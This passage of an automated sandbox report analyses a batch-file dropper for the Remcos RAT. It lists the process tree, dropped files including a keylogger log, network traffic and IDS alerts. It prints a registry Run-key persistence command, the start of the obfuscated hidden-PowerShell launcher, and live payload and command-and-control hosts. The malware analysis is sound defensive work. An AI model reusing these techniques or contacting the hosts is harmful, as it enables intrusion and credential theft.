                  • msiexec.exe: drops C:\ProgramData\remcos\logs.dat (data); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); Maps a DLL or memory area into another process; Installs a global keyboard hook
                    • msiexec.exe: Tries to harvest and steal browser information (history, passwords, etc)
                    • msiexec.exe
                    • cmd.exe
                      • conhost.exe
                      • reg.exe
                    • 2 other processes
                  • conhost.exe
                • cmd.exe (started by the sample): Suspicious powershell command line found
                  • powershell.exe: contacts careerfinder.ro; Found suspicious powershell code related to unpacking or dynamic code loading
                    • conhost.exe

                Source | Detection | Scanner | Label | Link
                MARSS-FILTRY_ZW015010024.bat | 11% | ReversingLabs | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
                http://www.imvu.comr | 0% | URL Reputation | safe |
                http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                https://go.micro | 0% | URL Reputation | safe |
                https://contoso.com/License | 0% | URL Reputation | safe |
                http://www.imvu.com | 0% | URL Reputation | safe |
                https://contoso.com/Icon | 0% | URL Reputation | safe |
                http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
                https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
                https://contoso.com/ | 0% | URL Reputation | safe |
                https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
                https://login.yahoo.com/config/login | 0% | URL Reputation | safe |
                https://aka.ms/pscore68 | 0% | URL Reputation | safe |
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                http://www.ebuddy.com | 0% | URL Reputation | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                careerfinder.ro | 185.248.196.6 | true | false | | unknown
                geoplugin.net | 178.237.33.50 | true | false | | unknown
                iniiivan.duckdns.org | 94.198.96.165 | true | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                https://careerfinder.ro/vn/Traurigheder.sea | false | | unknown
                https://careerfinder.ro/rs/wQpkVl14.bin | false | | unknown
                http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
                iniiivan.duckdns.org | true | | unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.248.196.6 | careerfinder.ro | Romania | 50937 | TES-ASRO | false
94.198.96.165 | iniiivan.duckdns.org | Italy | 49367 | ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1534998
Start date and time: 2024-10-16 13:06:33 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MARSS-FILTRY_ZW015010024.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winBAT@22/13@3/3
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 96%
                                                                • Number of executed functions: 146
                                                                • Number of non-executed functions: 316
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .bat
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 3664 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 6504 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: MARSS-FILTRY_ZW015010024.bat
Time | Type | Description
07:07:24 | API Interceptor | 83x Sleep call for process: powershell.exe modified
07:08:47 | API Interceptor | 308635x Sleep call for process: msiexec.exe modified
13:08:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run humplers %Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)
13:08:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run humplers %Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):246
                                                                Entropy (8bit):3.3612663250935837
                                                                Encrypted:false
                                                                SSDEEP:6:6lyDzlI5YcIeeDAlKe5q1gWAAe5q1gWAv:6lNec8e5BWFe5BW+
                                                                MD5:B12B5C452C8855C4E287ACB12111DE9E
                                                                SHA1:2571672D2C4C2C6E12B73687362B783D244FA570
                                                                SHA-256:E39577514F1A48299087DBEF5A094E7C2A2F9A76C598117F77E069D6D076C977
                                                                SHA-512:31111CAEB9EDAAB4FEB8D7316F782F0BB03A3698387424D1C734548BC297EF27F4C7107ABF835A35F24712DF511703E6943389CFD95B63E64E910937173157A5
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                Preview:....[.2.0.2.4./.1.0./.1.6. .0.7.:.0.8.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):956
                                                                Entropy (8bit):5.0171731747546415
                                                                Encrypted:false
                                                                SSDEEP:12:tkTLJend6CsGkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkq:qpSdRNuKyGX85MEBZvXhNlT3/7l1DYro
                                                                MD5:A1F5E6C8E8A324DA09719245F0765794
                                                                SHA1:B63E1AA4D65D834217D3EFB10E5FE66AD6AC1A1B
                                                                SHA-256:BEE4123C9657E40CDF62ADECA224866FCF4EB16FA125D28646416A37AEBA20C9
                                                                SHA-512:D0841DE286A58A703072670A1A0F837C503D21298ABDB5A1EAF20C9109013E22931B380AFCED9A611761C5FAC5D9DBF1546C21B4998CD8980CBE62CBB69B6553
                                                                Malicious:false
                                                                Preview:{. "geoplugin_request":"155.94.241.186",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):8003
                                                                Entropy (8bit):4.840877972214509
                                                                Encrypted:false
                                                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                MD5:106D01F562D751E62B702803895E93E0
                                                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                Malicious:false
                                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                                MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                                SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                                SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                                SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                                Malicious:false
                                                                Preview:@...e................................................@..........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x055f66bb, page size 32768, DirtyShutdown, Windows version 10.0
                                                                Category:dropped
                                                                Size (bytes):17301504
                                                                Entropy (8bit):0.8034575343924052
                                                                Encrypted:false
                                                                SSDEEP:6144:ydfjZb5aXEY2waXEY24URlIe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ++:AVu4e81ySaKKjgrONseWa
                                                                MD5:3E183CB192B5DED876AB55130A0847B2
                                                                SHA1:04D7FC15D852D90BD6A2E0522E142E62BA2B882E
                                                                SHA-256:8348288CB047B40594D8E2BD50309171A64571F2E897CD05F1DAF4C30CF5E32E
                                                                SHA-512:4F3E5AC73447813BBC30BF110DCC8506B5B4A354D056EA9946A02B2E79F246A66B633E81A2768DF57B3D2D1186DFF3EE8192C5245F320485500B4BAADC4E092F
                                                                Malicious:false
                                                                Preview:._f.... .......;!......E{ow("...{........................@...../....{.......|E.h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]................................... ......|E..................T.......|E..........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):2
                                                                Entropy (8bit):1.0
                                                                Encrypted:false
                                                                SSDEEP:3:Qn:Qn
                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                Malicious:false
                                                                Preview:..
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):472124
                                                                Entropy (8bit):5.8445094797070825
                                                                Encrypted:false
                                                                SSDEEP:6144:qEE6UbiRqt2GWupM8IXzrO1ohGfmtOxJvmeM3+v+zf/3oKfHzD0Dej+3YSY6j5ON:qXbiR8zM82CCkSrXRzHYuRSJ9nqP
                                                                MD5:45A31D507DAA8B7547BECC027B4EB279
                                                                SHA1:2BF357D70917E9B156AB5792623A39A04637F871
                                                                SHA-256:2CBBFEC1A0FEFA995B236ED816AA23DC543AB2A76B1C36183A9A263DABCF8EEA
                                                                SHA-512:081019ECDC07A7907C471388CAEF4CD4E5DD434760FF7A1D84E41A6E3665A0C0B8BBF3797A3526A16AEEFF15405694E059C32FDA2DDB26CEA38AD08F5C492C1E
                                                                Malicious:false
                                                                Preview:
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7070297602726994
                                                                Encrypted:false
                                                                SSDEEP:96:3KZOwCFoMTkvhkvCCta28MWY9jJbHKSd28MWY9jqbHKS+:6ZOdV3a2DvWSd2D0WS+
                                                                MD5:43D1562637276D19A014607894EB6526
                                                                SHA1:A735614DCBA5BAD7045C97515C2ADEBF249ADF4F
                                                                SHA-256:521164F19F637898B6497B30A9BC94B5C0D7DB6ED1257F26CF98CEAFE2E00037
                                                                SHA-512:35AF979B21B05BAA1774F2311A8C5C25D51790A324AADEBE3CEAA4952AFB68FF530FE32DEFC519E8615397B341B531A8B12857E8F6A55135C25F739F1A674F6B
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d......4H......z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......Q....Ao..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlPY.X....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....PY.X..Roaming.@......DWSlPY.X....C.......................I.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlPY.X....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlPY.X....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlPY.X....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlPY.X....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlPY.X....q...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7070297602726994
                                                                Encrypted:false
                                                                SSDEEP:96:3KZOwCFoMTkvhkvCCta28MWY9jJbHKSd28MWY9jqbHKS+:6ZOdV3a2DvWSd2D0WS+
                                                                MD5:43D1562637276D19A014607894EB6526
                                                                SHA1:A735614DCBA5BAD7045C97515C2ADEBF249ADF4F
                                                                SHA-256:521164F19F637898B6497B30A9BC94B5C0D7DB6ED1257F26CF98CEAFE2E00037
                                                                SHA-512:35AF979B21B05BAA1774F2311A8C5C25D51790A324AADEBE3CEAA4952AFB68FF530FE32DEFC519E8615397B341B531A8B12857E8F6A55135C25F739F1A674F6B
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d......4H......z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......Q....Ao..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlPY.X....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....PY.X..Roaming.@......DWSlPY.X....C.......................I.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlPY.X....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlPY.X....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlPY.X....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlPY.X....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlPY.X....q...........
                                                                File type:ASCII text, with very long lines (6087), with no line terminators
                                                                Entropy (8bit):5.343799254718803
                                                                TrID:
                                                                  File name:MARSS-FILTRY_ZW015010024.bat
                                                                  File size:6'087 bytes
                                                                  MD5:23d982d0c7540551e840392de11571ae
                                                                  SHA1:8cae67ab610dab59bf722ef2c1db09038e5a712d
                                                                  SHA256:e5ebe4d8925853fc1f233a5a6f7aa29fd8a7fa3a8ad27471c7d525a70f4461b6
                                                                  SHA512:f14b081fccbb2db1021aa03c5033ec59e22650a439eb5097eca4a7dce52035c06ab6d454eca95778fafcc6fd35de699182b380d12ace9420153e5cad8b5298f4
                                                                  SSDEEP:96:AyZFysox3pf4I8GJqS+Pwx5oDf9uS5sKXyKf6adkNqTSN/pk44RFw6ABZ6hdpsSB:AQoxZ2GgZq5oDg6FXjf6aTYoIBAhj36y
                                                                  TLSH:5EC15C471A0BE475033228E79F010D054F6E42FA02648BC2B61B5A2152C9FD8793CEBC
                                                                  File Content Preview:start /min powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$
                                                                  Icon Hash:9686878b929a9886
                                                                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                  2024-10-16T13:08:16.357207+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49887 | 94.198.96.165 | 53848 | TCP
                                                                  2024-10-16T13:08:17.984442+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49895 | 178.237.33.50 | 80 | TCP
                                                                  2024-10-16T13:08:18.336471+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49894 | 94.198.96.165 | 53848 | TCP
                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Oct 16, 2024 13:07:26.116014957 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:26.116045952 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:26.116141081 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:26.123673916 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:26.123688936 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.012545109 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.012623072 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.017381907 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.017401934 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.017801046 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.029944897 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.075406075 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.294976950 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.341480017 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.439320087 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.439341068 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.439373970 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.439395905 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.439412117 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.439476013 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.439541101 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.439578056 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.439589977 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.441356897 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.441373110 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.441443920 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.441469908 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.441518068 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.582772017 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.582799911 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.582876921 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.582911015 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.582961082 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.584125042 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.584152937 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.584213018 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.584220886 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.584258080 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.585541964 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.585562944 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.585638046 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.585644960 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.585685015 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.587374926 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.587408066 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.587479115 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.587492943 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.587532043 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.726965904 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.726991892 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.727122068 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.727148056 CEST | 443 | 49704 | 185.248.196.6 | 192.168.2.5
                                                                  Oct 16, 2024 13:07:27.727193117 CEST | 49704 | 443 | 192.168.2.5 | 185.248.196.6
                                                                  Oct 16, 2024 13:07:27.727482080 CEST44349704185.248.196.6192.168.2.5
                                                                  Oct 16, 2024 13:07:27.727499008 CEST44349704185.248.196.6192.168.2.5
                                                                  Oct 16, 2024 13:07:27.727569103 CEST49704443192.168.2.5185.248.196.6
                                                                  Oct 16, 2024 13:07:27.727580070 CEST44349704185.248.196.6192.168.2.5
                                                                  Oct 16, 2024 13:07:27.727617979 CEST49704443192.168.2.5185.248.196.6
                                                                  Oct 16, 2024 13:07:27.729377031 CEST44349704185.248.196.6192.168.2.5
                                                                  Oct 16, 2024 13:07:27.729397058 CEST44349704185.248.196.6192.168.2.5
                                                                  Oct 16, 2024 13:07:27.729482889 CEST49704443192.168.2.5185.248.196.6
                                                                  Oct 16, 2024 13:07:27.729490995 CEST44349704185.248.196.6192.168.2.5
